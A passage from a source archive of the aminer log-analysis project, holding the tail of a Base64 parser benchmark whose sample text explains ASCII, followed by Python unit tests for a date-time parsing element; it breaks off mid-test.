an action of some sort. ASCII was developed a long time ago and now the non-printing " \ # b"characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions " \ # b"of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are " \ # b"somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want "plain" text with " \ # b"no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they " \ # b"can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you " \ # b"can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. Computers can only " \ # b"understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" or an action of " \ # b"some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original " \ # b"purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-prin" base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHV" \ b"uZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYX" \ b"MgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub" \ b"24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFy" \ b"YWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUk" \ b"gd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cm" \ b"UuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50I" \ b"CdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQg" \ b"YW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWl" \ b"yIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIH" \ b"NhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoY" \ b"W5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0" \ b"aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9" \ b"uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2" \ b"UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tc" \ b"HJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlw" \ b"dGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWx" \ b"sIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2Nvcm" \ b"luZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5I" \ b"GltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4" \ b"dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2R" \ b"lIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcy" \ b"B0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0L" \ b"iBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQg" \ b"Zm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHR" \ b"pb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZW" \ b"xldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob" \ b"3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBh" \ b"cyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHV" \ b"zdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdG" \ b"VwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzI" \ b"GZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVt" \ b"YmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyB" \ b"vciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2" \ b"hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgY" \ b"W5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5" \ b"IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmU" \ b"gc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dC" \ b"B3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyI" \ b"GNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNh" \ b"dGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGF" \ b"zICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZX" \ b"JzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhc" \ b"mFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBh" \ b"bmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHR" \ b"oZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbg==" """ end_setup = """ dummy_match_context = DummyMatchContext(base64_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] base64_dme = Base64StringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) base64_dme.get_match_element("base64", match_context) """ _setup100 = import_setup + string100_setup + end_setup _setup4096 = import_setup + string4096_setup + end_setup # import timeit # times = 100000 # print("All text lengths are given from the original text. Base64 encoding needs 33% more characters." # " Every text length is run 100.000 times.") # t = timeit.timeit(setup=_setup100, stmt="run()", number=times) # print("Text length 100: ", t) # t = timeit.timeit(setup=_setup4096, stmt="run()", number=times) # print("Text length 4096: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DateTimeModelElementTest.py000066400000000000000000001254661437606560100306460ustar00rootroot00000000000000import unittest import logging import pytz import locale from io import StringIO from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers from datetime import datetime, timezone from pwd import getpwnam from grp import getgrnam class DateTimeModelElementTest(TestBase): """ Unittests for the DateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). """ id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with fractions data = b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC: it still works" date = b"07.02.2019 11:40:00 UTC" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 GMT: it still works" date = b"07.02.2019 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC+01: it still works" date = b"07.02.2019 11:40:00 UTC+01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) # wrong timezone identifiers for offsets data = b"07.02.2019 11:40:00 CET+01: it still works" date = b"07.02.2019 11:40:00 CET" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test with only date defined data = b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549497600, None) # test with only time defined. Here obviously the seconds can not be tested. data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, match_element.match_object, None) self.assertEqual(match_element.match_string, b"11:40:23") self.assertEqual(match_context.match_string, b"11:40:23") # %s data = b"1662760597" date = b"1662760597" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597, None) self.assertEqual(match_element.match_string, b"1662760597") self.assertEqual(match_context.match_string, b"1662760597") # %s with milliseconds data = b"1662760597123" date = b"1662760597123" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1000) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123, None) self.assertEqual(match_element.match_string, b"1662760597123") self.assertEqual(match_context.match_string, b"1662760597123") # %s with microseconds data = b"1662760597123456" date = b"1662760597123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1e6) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123456, None) self.assertEqual(match_element.match_string, b"1662760597123456") self.assertEqual(match_context.match_string, b"1662760597123456") def test2wrong_date(self): """Test if wrong input data does not return a match.""" # wrong day data = b"32.03.2019 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # missing T data = b"07.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # missing fractions data = b"07.02.2019 11:40:00.: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"Date %%d: %d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the DateTimeModelElement.""" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 GMT-1200: it still works" date = b"07.02.2018 11:40:00 GMT-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00-05:00: it still works" date = b"07.02.2018 11:40:00-05:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00+01:00: it still works" date = b"07.02.2018 11:40:00+01:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1") def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8") def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2017) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1486467600, None) match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2020) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" start_year = 2020 date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609500000, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" start_year = date_time_model_element.start_year match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609545540, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1577923141, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, 